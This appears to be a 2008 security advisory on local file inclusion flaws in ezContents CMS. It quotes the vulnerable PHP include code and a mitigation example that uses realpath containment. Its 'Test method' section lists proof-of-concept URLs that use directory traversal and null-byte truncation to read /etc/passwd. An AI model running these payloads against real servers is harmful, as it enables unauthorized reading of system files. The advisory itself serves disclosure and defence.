ezContents CMS multiple local file inclusion vulnerabilities (5)
Add date: 10/08/2008
Publishing date: 10/08/2008
global $EZ_SESSION_VARS;
$GLOBALS["ModuleName"] = 'news';
// $nLink is supplied in the request (see the test URLs below) and is not validated
$linkref = $nLink;
$chainlink = explode('/', $linkref);
$modfilename = array_pop($chainlink);
$GLOBALS["modfiledir"] = implode('/', $chainlink);
// Request-controlled path components reach include() / include_once()
include($GLOBALS["modfiledir"] . "/moduleref.php");
include_once($GLOBALS["language_home"] . $GLOBALS["gsLanguage"] . "/lang_admin.php");
include_once($GLOBALS["language_home"] . $GLOBALS["gsLanguage"] . "/lang_main.php");
#################################################
<* Source: Digital Security Research Group
Link: http://marc.info/?l=bugtraq&m=121968090815635&w=2
http://secunia.com/advisories/31606/
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
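The include code shown earlier builds its paths from request parameters (nLink, gsLanguage and language_home in the URLs above). The following is an added example, not ezContents or vendor code, of one way to constrain those includes to fixed directories. MODULES_ROOT, LANG_ROOT, ALLOWED_LANGUAGES, the function names and the directory layout are all assumptions.

```php
<?php
// Added example; constant and function names and the directory layout are assumptions.
const MODULES_ROOT = __DIR__ . '/modules';
const LANG_ROOT = __DIR__ . '/language';
const ALLOWED_LANGUAGES = ['en', 'de', 'ru']; // constructed sample list

// Canonical path of $relative under $root, or null if missing or outside $root.
function resolve_under(string $root, string $relative): ?string
{
    // Reject NUL bytes (the %00 in the test URLs); PHP before 5.3.4 truncated paths there.
    if (strpos($relative, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    $target = realpath($root . '/' . $relative); // collapses ../ and symlinks
    if ($rootReal === false || $target === false) {
        return null;
    }
    // Trailing separator so a sibling such as "modules_old" is not treated as inside "modules".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Same steps as the original: drop the last element of nLink, then look for moduleref.php.
function module_ref_path(string $nLink): ?string
{
    $chain = explode('/', $nLink);
    array_pop($chain);
    return resolve_under(MODULES_ROOT, implode('/', $chain) . '/moduleref.php');
}

// language_home is never taken from the request; gsLanguage is an allow-list lookup.
function language_file(string $gsLanguage, string $file): ?string
{
    if (!in_array($gsLanguage, ALLOWED_LANGUAGES, true)) {
        return null;
    }
    return resolve_under(LANG_ROOT, $gsLanguage . '/' . $file);
}

$nLink = isset($_GET['nLink']) && is_string($_GET['nLink']) ? $_GET['nLink'] : '';
$ref = module_ref_path($nLink);
$lang = language_file('en', 'lang_main.php'); // language chosen from server-side config
if ($ref === null || $lang === null) {
    http_response_code(400);
    exit('Invalid module or language reference');
}
include $ref;
include_once $lang;
```

Because the containment check runs on the realpath() result, both the ../ sequences and the ....// variant in the last URL are rejected once they resolve outside the fixed root.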
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
VisualShapers
-------------